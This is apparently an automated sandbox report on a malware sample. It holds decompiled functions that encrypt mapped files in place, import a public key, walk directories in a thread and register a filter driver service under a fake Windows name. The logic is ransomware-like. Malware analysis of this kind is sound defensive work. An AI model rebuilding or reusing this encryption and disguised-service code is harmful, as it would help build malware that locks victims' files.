                                                                                                                                                              				_t92 = _t57;
                                                                                                                                                              				if(_t57 == 0) {
                                                                                                                                                              					L17:
                                                                                                                                                              					CloseHandle(_v12);
                                                                                                                                                              					_t80 = _a8;
                                                                                                                                                              					_t82 = 0;
                                                                                                                                                              					goto L18;
                                                                                                                                                              				}
                                                                                                                                                              				_v36 = _v36 & 0x00000000;
                                                                                                                                                              				_t59 = E04E25A73(_t92, _t57, _v44, _v40, _a8,  &_v20,  &_v32); // executed
                                                                                                                                                              				if(_t59 == 0 || _v20 != 0) {
                                                                                                                                                              					L14:
                                                                                                                                                              					_t70 = _v36;
                                                                                                                                                              					goto L15;
                                                                                                                                                              				} else {
                                                                                                                                                              					_t63 = MapViewOfFile(_v8, 6, 0, 0, _a4); // executed
                                                                                                                                                              					_v28 = _t63;
                                                                                                                                                              					if(_t63 == 0) {
                                                                                                                                                              						goto L14;
                                                                                                                                                              					}
                                                                                                                                                              					__imp__CryptEncrypt(_v16, 0, _v24, 0, _t63,  &_a4, _t69);
                                                                                                                                                              					_t70 = _t63;
                                                                                                                                                              					if(_t70 != 0) {
                                                                                                                                                              						FlushViewOfFile(_v28, _a4);
                                                                                                                                                              					}
                                                                                                                                                              					UnmapViewOfFile(_v28);
                                                                                                                                                              					_t97 = _t70;
                                                                                                                                                              					if(_t70 != 0) {
                                                                                                                                                              						E04E25BC4(_t97, _v8, _t85, 0, _a8); // executed
                                                                                                                                                              					}
                                                                                                                                                              					L15:
                                                                                                                                                              					CloseHandle(_v8);
                                                                                                                                                              					if(_t70 == 0) {
                                                                                                                                                              						asm("sbb edi, [ebp-0x24]");
                                                                                                                                                              						E04E25A11(_v12, _t85 - _v44, 0);
                                                                                                                                                              					}
                                                                                                                                                              					goto L17;
                                                                                                                                                              				}
                                                                                                                                                              			}

























                                                                                                                                                              0x04e25d13
                                                                                                                                                              0x04e25d16
                                                                                                                                                              0x04e25d18
                                                                                                                                                              0x04e25d21
                                                                                                                                                              0x04e25d24
                                                                                                                                                              0x04e25d27
                                                                                                                                                              0x04e25d2a
                                                                                                                                                              0x04e25d32
                                                                                                                                                              0x04e25e9c
                                                                                                                                                              0x04e25e9c
                                                                                                                                                              0x04e25e9c
                                                                                                                                                              0x04e25d46
                                                                                                                                                              0x04e25d4c
                                                                                                                                                              0x04e25d52
                                                                                                                                                              0x04e25e7c
                                                                                                                                                              0x04e25e7f
                                                                                                                                                              0x04e25e88
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25e8f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25e92
                                                                                                                                                              0x04e25e88
                                                                                                                                                              0x04e25d5d
                                                                                                                                                              0x04e25d60
                                                                                                                                                              0x04e25d66
                                                                                                                                                              0x04e25d69
                                                                                                                                                              0x04e25d71
                                                                                                                                                              0x04e25d74
                                                                                                                                                              0x04e25d76
                                                                                                                                                              0x04e25d83
                                                                                                                                                              0x04e25d8a
                                                                                                                                                              0x04e25d8d
                                                                                                                                                              0x04e25d95
                                                                                                                                                              0x04e25d9f
                                                                                                                                                              0x04e25d9f
                                                                                                                                                              0x04e25da7
                                                                                                                                                              0x04e25dad
                                                                                                                                                              0x04e25daf
                                                                                                                                                              0x04e25db3
                                                                                                                                                              0x04e25dbc
                                                                                                                                                              0x04e25dc2
                                                                                                                                                              0x04e25dc5
                                                                                                                                                              0x04e25dc7
                                                                                                                                                              0x04e25e6e
                                                                                                                                                              0x04e25e71
                                                                                                                                                              0x04e25e77
                                                                                                                                                              0x04e25e7a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25e7a
                                                                                                                                                              0x04e25dcd
                                                                                                                                                              0x04e25de3
                                                                                                                                                              0x04e25dea
                                                                                                                                                              0x04e25e4e
                                                                                                                                                              0x04e25e4e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25df3
                                                                                                                                                              0x04e25dfd
                                                                                                                                                              0x04e25e03
                                                                                                                                                              0x04e25e08
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25e1a
                                                                                                                                                              0x04e25e20
                                                                                                                                                              0x04e25e24
                                                                                                                                                              0x04e25e2c
                                                                                                                                                              0x04e25e2c
                                                                                                                                                              0x04e25e35
                                                                                                                                                              0x04e25e3b
                                                                                                                                                              0x04e25e3d
                                                                                                                                                              0x04e25e47
                                                                                                                                                              0x04e25e47
                                                                                                                                                              0x04e25e51
                                                                                                                                                              0x04e25e54
                                                                                                                                                              0x04e25e5c
                                                                                                                                                              0x04e25e61
                                                                                                                                                              0x04e25e69
                                                                                                                                                              0x04e25e69
                                                                                                                                                              0x00000000
                                                                                                                                                              0x04e25e5c

                                                                                                                                                              APIs
                                                                                                                                                              • CryptDuplicateKey.ADVAPI32(?,00000000,00000000,?,00000000,?,00000000), ref: 04E25D2A
                                                                                                                                                              • CreateFileW.KERNELBASE(?,C0000000,00000000,00000000,00000003,00000000,00000000), ref: 04E25D46
                                                                                                                                                              • GetFileSizeEx.KERNEL32(00000000,?), ref: 04E25D60
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E25D8D
                                                                                                                                                              • CreateFileMappingW.KERNELBASE(?,00000000,00000004,00000000,?,00000000), ref: 04E25DBC
                                                                                                                                                              • MapViewOfFile.KERNELBASE(?,00000006,00000000,00000000,?,00000000,?,?,?,00000010,?), ref: 04E25DFD
                                                                                                                                                              • CryptEncrypt.ADVAPI32(?,00000000,?,00000000,00000000,?,?), ref: 04E25E1A
                                                                                                                                                              • FlushViewOfFile.KERNEL32(?,?), ref: 04E25E2C
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(?), ref: 04E25E35
                                                                                                                                                              • CloseHandle.KERNEL32(?,00000000,?,?,?,00000010,?), ref: 04E25E54
                                                                                                                                                              • CloseHandle.KERNEL32(?), ref: 04E25E71
                                                                                                                                                              • CryptDestroyKey.ADVAPI32(?), ref: 04E25E7F
                                                                                                                                                              • SetEvent.KERNEL32(?), ref: 04E25E92
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: File$CryptView$CloseCreateHandle$DestroyDuplicateEncryptEventFlushMappingSizeUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 799083214-0
                                                                                                                                                              • Opcode ID: ea5258dc43f9a35f9547174e6eecc8241fb5eac724102ecb460028d3d557a446
                                                                                                                                                              • Instruction ID: 9e4654fef9266c5ce39e3676821bd3c55b54d49c512d5a30114e4e1aa8cdc09e
                                                                                                                                                              • Opcode Fuzzy Hash: ea5258dc43f9a35f9547174e6eecc8241fb5eac724102ecb460028d3d557a446
                                                                                                                                                              • Instruction Fuzzy Hash: 5E513972900229BBDF219FA1DE48EEFBF79FF08355F144125FA05A2150D776AA40DBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                              			E04E25A73(void* __eflags, void* _a4, intOrPtr _a8, long _a16, signed int* _a20, signed int* _a24) {
                                                                                                                                                              				long _v8;
                                                                                                                                                              				void* _v12;
                                                                                                                                                              				struct _SYSTEM_INFO _v48;
                                                                                                                                                              				void* _t45;
                                                                                                                                                              				long _t47;
                                                                                                                                                              				void* _t48;
                                                                                                                                                              				signed int _t51;
                                                                                                                                                              				void** _t53;
                                                                                                                                                              				long _t54;
                                                                                                                                                              				long* _t56;
                                                                                                                                                              				void* _t62;
                                                                                                                                                              				void* _t63;
                                                                                                                                                              				signed int _t64;
                                                                                                                                                              				long _t78;
                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                              				void* _t88;
                                                                                                                                                              				void* _t98;
                                                                                                                                                              				long* _t103;
                                                                                                                                                              
                                                                                                                                                              				_t64 = 8;
                                                                                                                                                              				_v48.dwOemId = 0;
                                                                                                                                                              				memset( &(_v48.dwPageSize), 0, _t64 << 2);
                                                                                                                                                              				_v8 = 0;
                                                                                                                                                              				GetSystemInfo( &_v48); // executed
                                                                                                                                                              				_t88 =  *(_a16 + 0x44) + 0x16;
                                                                                                                                                              				_t82 = _a8 - _t88;
                                                                                                                                                              				asm("sbb [ebp+0x10], ebx");
                                                                                                                                                              				_t61 = _v48.dwAllocationGranularity;
                                                                                                                                                              				asm("adc edx, [ebp+0x10]");
                                                                                                                                                              				asm("sbb edx, eax");
                                                                                                                                                              				_a8 = _t82;
                                                                                                                                                              				_t45 = E04E2A6B0(_v48.dwAllocationGranularity + _t82 - 1, 0, _v48.dwAllocationGranularity, 0);
                                                                                                                                                              				asm("sbb edx, 0x0");
                                                                                                                                                              				_t47 = E04E2A670(_t45 - 1, 0, _t61, 0);
                                                                                                                                                              				_t62 = _t82 - _t47;
                                                                                                                                                              				_t48 = MapViewOfFile(_a4, 4, 0, _t47, _t62 + _t88); // executed
                                                                                                                                                              				_v12 = _t48;
                                                                                                                                                              				_t98 = _t48;
                                                                                                                                                              				if(_t98 != 0) {
                                                                                                                                                              					_t78 = _a16;
                                                                                                                                                              					_push(9);
                                                                                                                                                              					asm("repe cmpsw");
                                                                                                                                                              					_t51 = 0 | _t98 == 0x00000000;
                                                                                                                                                              					 *_a20 = _t51;
                                                                                                                                                              					if(_t51 == 0) {
                                                                                                                                                              						_v8 = 1;
                                                                                                                                                              					} else {
                                                                                                                                                              						_t53 =  &_a4;
                                                                                                                                                              						_a4 = 0;
                                                                                                                                                              						__imp__CryptDuplicateHash( *((intOrPtr*)(_t78 + 0x40)), 0, 0, _t53);
                                                                                                                                                              						if(_t53 != 0) {
                                                                                                                                                              							__imp__CryptHashData(_a4, _v12 + _t62, 4, 0);
                                                                                                                                                              							if(_t53 != 0) {
                                                                                                                                                              								_t54 =  *(_a16 + 0x44);
                                                                                                                                                              								_a16 = _t54;
                                                                                                                                                              								_t63 = LocalAlloc(0x40, _t54);
                                                                                                                                                              								if(_t63 != 0) {
                                                                                                                                                              									_t56 =  &_a16;
                                                                                                                                                              									__imp__CryptGetHashParam(_a4, 2, _t63, _t56, 0);
                                                                                                                                                              									_v8 = _t56;
                                                                                                                                                              									_t103 = _t56;
                                                                                                                                                              									if(_t103 != 0) {
                                                                                                                                                              										asm("repe cmpsb");
                                                                                                                                                              										 *_a24 = 0 | _t103 == 0x00000000;
                                                                                                                                                              									}
                                                                                                                                                              									LocalFree(_t63);
                                                                                                                                                              								}
                                                                                                                                                              							}
                                                                                                                                                              							__imp__CryptDestroyHash(_a4);
                                                                                                                                                              						}
                                                                                                                                                              					}
                                                                                                                                                              					UnmapViewOfFile(_v12);
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}





















                                                                                                                                                              0x04e25a80
                                                                                                                                                              0x04e25a83
                                                                                                                                                              0x04e25a89
                                                                                                                                                              0x04e25a8f
                                                                                                                                                              0x04e25a92
                                                                                                                                                              0x04e25aa1
                                                                                                                                                              0x04e25aa4
                                                                                                                                                              0x04e25aa6
                                                                                                                                                              0x04e25aa9
                                                                                                                                                              0x04e25ab4
                                                                                                                                                              0x04e25abc
                                                                                                                                                              0x04e25ac0
                                                                                                                                                              0x04e25ac3
                                                                                                                                                              0x04e25acd
                                                                                                                                                              0x04e25ad6
                                                                                                                                                              0x04e25add
                                                                                                                                                              0x04e25aea
                                                                                                                                                              0x04e25af0
                                                                                                                                                              0x04e25af3
                                                                                                                                                              0x04e25af5
                                                                                                                                                              0x04e25afb
                                                                                                                                                              0x04e25b05
                                                                                                                                                              0x04e25b11
                                                                                                                                                              0x04e25b17
                                                                                                                                                              0x04e25b1a
                                                                                                                                                              0x04e25b20
                                                                                                                                                              0x04e25baa
                                                                                                                                                              0x04e25b26
                                                                                                                                                              0x04e25b26
                                                                                                                                                              0x04e25b2f
                                                                                                                                                              0x04e25b32
                                                                                                                                                              0x04e25b3a
                                                                                                                                                              0x04e25b49
                                                                                                                                                              0x04e25b51
                                                                                                                                                              0x04e25b56
                                                                                                                                                              0x04e25b5c
                                                                                                                                                              0x04e25b65
                                                                                                                                                              0x04e25b69
                                                                                                                                                              0x04e25b6d
                                                                                                                                                              0x04e25b77
                                                                                                                                                              0x04e25b7d
                                                                                                                                                              0x04e25b80
                                                                                                                                                              0x04e25b82
                                                                                                                                                              0x04e25b8e
                                                                                                                                                              0x04e25b96
                                                                                                                                                              0x04e25b96
                                                                                                                                                              0x04e25b99
                                                                                                                                                              0x04e25b99
                                                                                                                                                              0x04e25b69
                                                                                                                                                              0x04e25ba2
                                                                                                                                                              0x04e25ba2
                                                                                                                                                              0x04e25b3a
                                                                                                                                                              0x04e25bb4
                                                                                                                                                              0x04e25bb4
                                                                                                                                                              0x04e25bc1

                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemInfo.KERNELBASE(?,00000000,?,?,?,?,?,?,04E25DE8,00000000,?,?,?,00000010,?), ref: 04E25A92
                                                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04E25AC3
                                                                                                                                                              • MapViewOfFile.KERNELBASE(00000010,00000004,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25AEA
                                                                                                                                                              • CryptDuplicateHash.ADVAPI32(?,00000000,00000000,00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25B32
                                                                                                                                                              • CryptHashData.ADVAPI32(00000010,00000010,00000004,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25B49
                                                                                                                                                              • LocalAlloc.KERNEL32(00000040,?,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25B5F
                                                                                                                                                              • CryptGetHashParam.ADVAPI32(00000010,00000002,00000000,?,00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25B77
                                                                                                                                                              • LocalFree.KERNEL32(00000000,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25B99
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25BA2
                                                                                                                                                              • UnmapViewOfFile.KERNEL32(00000010,?,00000000,?,-00000001,?,?,00000000,?,?,?,00000000), ref: 04E25BB4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CryptHash$FileLocalView$AllocDataDestroyDuplicateFreeInfoParamSystemUnmapUnothrow_t@std@@@__ehfuncinfo$??2@
                                                                                                                                                              • String ID: encrypted
                                                                                                                                                              • API String ID: 569730286-1467498611
                                                                                                                                                              • Opcode ID: 99c09d48cbba69e1b0110932a9b7ef75b375cd7d0dea2b47c3950a4f218d67de
                                                                                                                                                              • Instruction ID: f49605518216707bdad227640f61d3d6ac3cc895d5361e02d9a7dc5a964c5240
                                                                                                                                                              • Opcode Fuzzy Hash: 99c09d48cbba69e1b0110932a9b7ef75b375cd7d0dea2b47c3950a4f218d67de
                                                                                                                                                              • Instruction Fuzzy Hash: FE416DB2600219AFEB148F75DE48EAA3BA9FB44355F048028FE05E7244DB71ED05CBA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                              			E04E21368(void* __ecx) {
                                                                                                                                                              				void* _v8;
                                                                                                                                                              				void* _t5;
                                                                                                                                                              				void* _t13;
                                                                                                                                                              				void* _t17;
                                                                                                                                                              
                                                                                                                                                              				_t5 = OpenSCManagerW(0, 0, 0xf003f); // executed
                                                                                                                                                              				_t13 = _t5;
                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                              					_t17 = CreateServiceW(_t13, L"cscc", L"Windows Client Side Caching DDriver", 0xf01ff, 1, 0, 3, L"cscc.dat", L"Filter", 0, L"FltMgr", 0, 0);
                                                                                                                                                              					if(_t17 == 0) {
                                                                                                                                                              						_v8 = GetLastError();
                                                                                                                                                              					} else {
                                                                                                                                                              						_v8 = 0;
                                                                                                                                                              					}
                                                                                                                                                              					if(_t17 != 0) {
                                                                                                                                                              						CloseServiceHandle(_t17);
                                                                                                                                                              					}
                                                                                                                                                              					CloseServiceHandle(_t13);
                                                                                                                                                              				} else {
                                                                                                                                                              					_v8 = GetLastError();
                                                                                                                                                              				}
                                                                                                                                                              				return _v8;
                                                                                                                                                              			}







                                                                                                                                                              0x04e21377
                                                                                                                                                              0x04e2137d
                                                                                                                                                              0x04e21381
                                                                                                                                                              0x04e213bc
                                                                                                                                                              0x04e213c0
                                                                                                                                                              0x04e213cd
                                                                                                                                                              0x04e213c2
                                                                                                                                                              0x04e213c2
                                                                                                                                                              0x04e213c2
                                                                                                                                                              0x04e213d8
                                                                                                                                                              0x04e213db
                                                                                                                                                              0x04e213db
                                                                                                                                                              0x04e213de
                                                                                                                                                              0x04e21383
                                                                                                                                                              0x04e21389
                                                                                                                                                              0x04e21389
                                                                                                                                                              0x04e213e7

                                                                                                                                                              APIs
                                                                                                                                                              • OpenSCManagerW.SECHOST(00000000,00000000,000F003F,00000000,?,00730063,?,04E2154F,00000000,04E211D0,?,?,?), ref: 04E21377
                                                                                                                                                              • GetLastError.KERNEL32(?,04E2154F,00000000,04E211D0,?,?,?), ref: 04E21383
                                                                                                                                                              • CreateServiceW.ADVAPI32(00000000,cscc,Windows Client Side Caching DDriver,000F01FF,00000001,00000000,00000003,cscc.dat,Filter,00000000,FltMgr,00000000,00000000,?,?,04E2154F), ref: 04E213B6
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,04E2154F,00000000,04E211D0,?,?,?), ref: 04E213DB
                                                                                                                                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,04E2154F,00000000,04E211D0,?,?,?), ref: 04E213DE
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Service$CloseHandle$CreateErrorLastManagerOpen
                                                                                                                                                              • String ID: Filter$FltMgr$Windows Client Side Caching DDriver$cscc$cscc.dat
                                                                                                                                                              • API String ID: 2226085316-2908389127
                                                                                                                                                              • Opcode ID: ad51e8301369631d708eb4b4d0dbad7f011380668d4834f921a1b968c022a1f4
                                                                                                                                                              • Instruction ID: 1be3e61fb53f0efa5eb237934097cc46127f77063dee78ca8ed940c2a715a19a
                                                                                                                                                              • Opcode Fuzzy Hash: ad51e8301369631d708eb4b4d0dbad7f011380668d4834f921a1b968c022a1f4
                                                                                                                                                              • Instruction Fuzzy Hash: 40018631782338BBC7325BA69E4DDAFBE6EDB05BA3B011111F606B3504D5F56E01DAA0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                              			E04E26299(void* __ecx, void* _a4) {
                                                                                                                                                              				void* __esi;
                                                                                                                                                              				void* _t12;
                                                                                                                                                              				char* _t13;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              				void* _t19;
                                                                                                                                                              				void* _t22;
                                                                                                                                                              				void* _t26;
                                                                                                                                                              				int _t31;
                                                                                                                                                              				void* _t32;
                                                                                                                                                              				void* _t33;
                                                                                                                                                              				void* _t34;
                                                                                                                                                              				long** _t36;
                                                                                                                                                              				void* _t38;
                                                                                                                                                              
                                                                                                                                                              				_t33 = __ecx;
                                                                                                                                                              				_t31 = 0;
                                                                                                                                                              				_t12 = CreateEventW(0, 1, 0, 0);
                                                                                                                                                              				_t38 = _a4;
                                                                                                                                                              				 *(_t38 + 0x48) = _t12;
                                                                                                                                                              				if(_t12 != 0) {
                                                                                                                                                              					_t36 = _t38 + 0x30;
                                                                                                                                                              					_t16 = E04E25507(_t36); // executed
                                                                                                                                                              					if(_t16 != 0) {
                                                                                                                                                              						_t19 = E04E25613( *_t36,  *((intOrPtr*)(_t38 + 0x34)), _t38 + 0x38); // executed
                                                                                                                                                              						if(_t19 != 0) {
                                                                                                                                                              							_t22 = E04E26085(_t38, _t33); // executed
                                                                                                                                                              							if(_t22 != 0) {
                                                                                                                                                              								if(E04E26246(_t33, _t38) != 0) {
                                                                                                                                                              									_t26 = CreateThread(0, 0, E04E260F9, _t38, 0, 0); // executed
                                                                                                                                                              									_t32 = _t26;
                                                                                                                                                              									E04E25E9F(_t38 + 4, 0x11, _t38); // executed
                                                                                                                                                              									if(_t32 != 0) {
                                                                                                                                                              										WaitForSingleObject(_t32, 0xffffffff);
                                                                                                                                                              										CloseHandle(_t32);
                                                                                                                                                              									}
                                                                                                                                                              									__imp__CryptDestroyHash( *((intOrPtr*)(_t38 + 0x40)));
                                                                                                                                                              									_t31 = 0;
                                                                                                                                                              								}
                                                                                                                                                              								CryptDestroyKey( *(_t38 + 0x3c));
                                                                                                                                                              							}
                                                                                                                                                              							CryptDestroyKey( *(_t38 + 0x38));
                                                                                                                                                              						}
                                                                                                                                                              						CryptReleaseContext( *_t36, _t31);
                                                                                                                                                              					}
                                                                                                                                                              					CloseHandle( *(_t38 + 0x48));
                                                                                                                                                              				}
                                                                                                                                                              				_t34 = 0x21;
                                                                                                                                                              				_t13 = _t38 + 0xc;
                                                                                                                                                              				do {
                                                                                                                                                              					 *_t13 = 0;
                                                                                                                                                              					_t13 = _t13 + 1;
                                                                                                                                                              					_t34 = _t34 - 1;
                                                                                                                                                              				} while (_t34 != 0);
                                                                                                                                                              				LocalFree(_t38);
                                                                                                                                                              				return 0;
                                                                                                                                                              			}
















                                                                                                                                                              0x04e26299
                                                                                                                                                              0x04e2629e
                                                                                                                                                              0x04e262a5
                                                                                                                                                              0x04e262ab
                                                                                                                                                              0x04e262ae
                                                                                                                                                              0x04e262b3
                                                                                                                                                              0x04e262ba
                                                                                                                                                              0x04e262be
                                                                                                                                                              0x04e262c5
                                                                                                                                                              0x04e262d0
                                                                                                                                                              0x04e262d7
                                                                                                                                                              0x04e262db
                                                                                                                                                              0x04e262e2
                                                                                                                                                              0x04e262eb
                                                                                                                                                              0x04e262f7
                                                                                                                                                              0x04e262fe
                                                                                                                                                              0x04e26306
                                                                                                                                                              0x04e2630d
                                                                                                                                                              0x04e26312
                                                                                                                                                              0x04e26319
                                                                                                                                                              0x04e26319
                                                                                                                                                              0x04e26322
                                                                                                                                                              0x04e26328
                                                                                                                                                              0x04e26328
                                                                                                                                                              0x04e2632d
                                                                                                                                                              0x04e2632d
                                                                                                                                                              0x04e26336
                                                                                                                                                              0x04e26336
                                                                                                                                                              0x04e2633f
                                                                                                                                                              0x04e2633f
                                                                                                                                                              0x04e26348
                                                                                                                                                              0x04e2634e
                                                                                                                                                              0x04e26351
                                                                                                                                                              0x04e26352
                                                                                                                                                              0x04e26355
                                                                                                                                                              0x04e26355
                                                                                                                                                              0x04e26358
                                                                                                                                                              0x04e26359
                                                                                                                                                              0x04e26359
                                                                                                                                                              0x04e2635d
                                                                                                                                                              0x04e26368

                                                                                                                                                              APIs
                                                                                                                                                              • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 04E262A5
                                                                                                                                                              • LocalFree.KERNEL32(?), ref: 04E2635D
                                                                                                                                                                • Part of subcall function 04E25507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04E262C3,?), ref: 04E25520
                                                                                                                                                                • Part of subcall function 04E25507: GetLastError.KERNEL32(?,04E262C3,?), ref: 04E25528
                                                                                                                                                                • Part of subcall function 04E25507: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04E262C3,?), ref: 04E2553E
                                                                                                                                                              • CloseHandle.KERNEL32(?,?), ref: 04E26348
                                                                                                                                                                • Part of subcall function 04E25613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04E25636
                                                                                                                                                                • Part of subcall function 04E25613: LocalAlloc.KERNEL32(00000040,?,00000000), ref: 04E2564C
                                                                                                                                                                • Part of subcall function 04E25613: CryptStringToBinaryW.CRYPT32(?,00000000,00000001,00000000,?,00000000,00000000), ref: 04E25662
                                                                                                                                                                • Part of subcall function 04E25613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04E25682
                                                                                                                                                                • Part of subcall function 04E25613: LocalAlloc.KERNEL32(00000040,?), ref: 04E2568D
                                                                                                                                                                • Part of subcall function 04E25613: CryptDecodeObjectEx.CRYPT32(00000001,00000008,?,?,00000000,00000000,00000000,?), ref: 04E256A6
                                                                                                                                                                • Part of subcall function 04E25613: CryptImportPublicKeyInfo.CRYPT32(?,00000001,00000000,?), ref: 04E256B5
                                                                                                                                                                • Part of subcall function 04E25613: LocalFree.KERNEL32(00000000), ref: 04E256BF
                                                                                                                                                                • Part of subcall function 04E25613: LocalFree.KERNEL32(?), ref: 04E256C8
                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,?), ref: 04E2633F
                                                                                                                                                                • Part of subcall function 04E26085: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,?,00000000,?,?,?,04E262E0,?,?,?,?), ref: 04E260A6
                                                                                                                                                                • Part of subcall function 04E26085: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,?,04E262E0,?,?,?,?), ref: 04E260BA
                                                                                                                                                                • Part of subcall function 04E26085: CryptDeriveKey.ADVAPI32(?,0000660E,?,00000001,?,?,?,?,04E262E0,?,?,?,?), ref: 04E260D3
                                                                                                                                                                • Part of subcall function 04E26085: CryptDestroyHash.ADVAPI32(?,?,?,?,04E262E0,?,?,?,?), ref: 04E260DF
                                                                                                                                                              • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04E26336
                                                                                                                                                                • Part of subcall function 04E26246: CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?,?,00000000,?,?,04E262E9,?,?,?,?), ref: 04E26260
                                                                                                                                                                • Part of subcall function 04E26246: CryptHashData.ADVAPI32(?,?,00000021,00000000,?,?,04E262E9,?,?,?,?), ref: 04E26273
                                                                                                                                                                • Part of subcall function 04E26246: CryptGetHashParam.ADVAPI32(?,00000002,00000000,?,00000000,?,?,04E262E9,?,?,?,?), ref: 04E26289
                                                                                                                                                              • CreateThread.KERNELBASE ref: 04E262F7
                                                                                                                                                                • Part of subcall function 04E25E9F: PathCombineW.SHLWAPI(?,?,04E31554,?,?), ref: 04E25EC8
                                                                                                                                                                • Part of subcall function 04E25E9F: FindFirstFileW.KERNELBASE(?,?), ref: 04E25EE3
                                                                                                                                                                • Part of subcall function 04E25E9F: WaitForMultipleObjects.KERNEL32(00000001,?,00000000,00000000), ref: 04E25F09
                                                                                                                                                                • Part of subcall function 04E25E9F: PathCombineW.SHLWAPI(?,?,?), ref: 04E25FB1
                                                                                                                                                                • Part of subcall function 04E25E9F: StrStrIW.SHLWAPI(?,04E33014), ref: 04E25FE9
                                                                                                                                                              • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000011,?), ref: 04E26312
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 04E26319
                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?,?,00000011,?), ref: 04E26322
                                                                                                                                                              • CryptDestroyKey.ADVAPI32(?,?,?,?,?), ref: 04E2632D
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
